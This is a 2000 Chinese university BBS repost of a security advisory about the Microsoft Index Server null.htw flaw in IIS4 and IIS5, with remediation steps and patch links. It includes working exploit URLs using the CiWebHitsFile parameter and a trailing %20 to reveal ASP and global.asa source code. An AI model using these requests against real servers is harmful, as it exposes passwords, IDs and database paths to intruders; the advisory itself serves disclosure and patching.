荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: williamlong (蓝色月光), 信区: Hacker
标 题: IIS4和IIS5泄漏asp等文件源代码的漏洞
发信站: BBS 荔园晨风站 (Mon Apr 3 13:10:22 2000), 转信
漏洞发布时间:2000-04-01
漏 洞 描 述:
Cerberus安全组织发现了微软Index Server的第三个可以察看asp源代码和其它页面的
漏洞。包括运行IIS4或者IIS5的Index Server,甚至以及添打了最近关于参看源代码的
补丁程序的系统,或者更不没有.htw文件的系统,一样存在该问题。获得asp程序,甚
至global.asa文件的源代码,无疑对系统是一个非常重大的安全隐患。往往这些代码中
包含了用户密码和ID,以及数据库的源路径和名称等等。这对于攻击者收集系统信息,
方面下一步的入侵都是非常重要的。
通过构建下面的特殊程序可以参看该程序源代码:
http://www.victim.com/null.htw?CiWebHitsFile=/default.asp&CiRestriction=none
&CiHiliteType=Full
这样只是返回一些html格式的文件代码,但是当你添加%20到CiWebHitsFile的参数后
面,如下:
http://www.victim.com/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=n
one&CiHiliteType=Full
这将获得该程序的源代码。
(注意:/default.asp是以web的根开始计算。如某站点的
http://www.victim.com/welcome/welcome.asp
那么对应就是:
http://www.victim.com/null.htw?CiWebHitsFile=/welcome/welcome.asp%20&CiRestr
iction=none&CiHiliteType=Full
)
由于'null.htw'文件并非真正的系统映射文件,所以只是一个储存在系统内存中的虚拟
文件。哪怕你已经从你的系统中删除了所有的真实的.htw文件,但是由于对null.htw文
件的请求默认是由webhits.dll来处理。所以,IIS仍然收到该漏洞的威胁。
解 决 方 法:
如果该webhits提供的功能是系统必须的,请下载相应的补丁程序。
如果没必要,请用IIS的MMC管理工具简单移除.htw的映象文件。
相关信息可以参看下面链接:
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
补丁程序如下:
Index Server 2.0:
Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Alpha:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Indexing Services for Windows 2000:
Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17726
--
☆ 来源:.BBS 荔园晨风站 bbs.szu.edu.cn.[FROM: AnonymousOrganizatio]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店